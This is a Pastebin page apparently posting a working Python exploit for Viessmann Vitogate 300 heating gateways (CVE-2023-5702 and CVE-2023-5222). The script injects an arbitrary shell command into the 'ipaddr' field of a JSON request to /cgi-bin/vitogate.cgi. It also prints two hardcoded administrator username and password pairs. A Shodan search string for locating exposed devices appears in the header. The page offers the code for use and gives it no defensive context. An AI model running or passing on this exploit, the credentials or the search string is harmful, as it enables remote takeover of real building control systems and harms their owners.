Advertisement
FlyFar

Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE) - CVE-2023-5702 & CVE-2023-5222

Mar 14th, 2024
822
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.48 KB | Cybersecurity | 0 0
  1. #- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
  2. #- Shodan Dork: http.title:'Vitogate 300'
  3. #- Exploit Author: ByteHunter
  4. #- Email: 0xByteHunter@proton.me
  5. #- Version: versions up to 2.1.3.0
  6. #- Tested on: 2.1.1.0
  7. #- CVE : CVE-2023-5702 & CVE-2023-5222
  8.  
  9.  
  10. import argparse
  11. import requests
  12.  
  13. def banner():
  14.     banner = """
  15.    ╔═══════════════════════════════════╗
  16.             CVE-2023-5702  
  17.           Vitogate 300 RCE
  18.           Author: ByteHunter      
  19.    ╚═══════════════════════════════════╝
  20.    """
  21.  
  22.     print(banner)
  23.  
  24.  
  25. def send_post_request(target_ip, command, target_port):
  26.     payload = {
  27.         "method": "put",
  28.         "form": "form-4-7",
  29.         "session": "",
  30.         "params": {
  31.             "ipaddr": f"1;{command}"
  32.         }
  33.     }
  34.  
  35.     headers = {
  36.         "Host": target_ip,
  37.         "Content-Length": str(len(str(payload))),
  38.         "Content-Type": "application/json"
  39.     }
  40.  
  41.     url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"
  42.  
  43.  
  44.     response = requests.post(url, json=payload, headers=headers)
  45.  
  46.     if response.status_code == 200:
  47.         print("Result:")
  48.         print(response.text)
  49.     else:
  50.         print(f"Request failed! status code: {response.status_code}")
  51.  
  52. def main():
  53.     parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
  54.     parser.add_argument("--target", required=False, help="Target IP address")
  55.     parser.add_argument("--port", required=False, help="Target port",default="80")
  56.     parser.add_argument("--command", required=False, help="Command")
  57.     parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")
  58.  
  59.     args = parser.parse_args()
  60.  
  61.     if args.creds:
  62.         print("Vitogate 300 hardcoded administrative accounts credentials")
  63.         print("Username: vitomaster, Password: viessmann1917")
  64.         print("Username: vitogate, Password: viessmann")
  65.     else:
  66.         target_ip = args.target
  67.         target_port = args.port
  68.         command = args.command
  69.  
  70.         if not (target_ip and command):
  71.             print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
  72.             return
  73.  
  74.         send_post_request(target_ip, command,target_port)
  75.  
  76. if __name__ == "__main__":
  77.     banner()
  78.     main()
  79.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement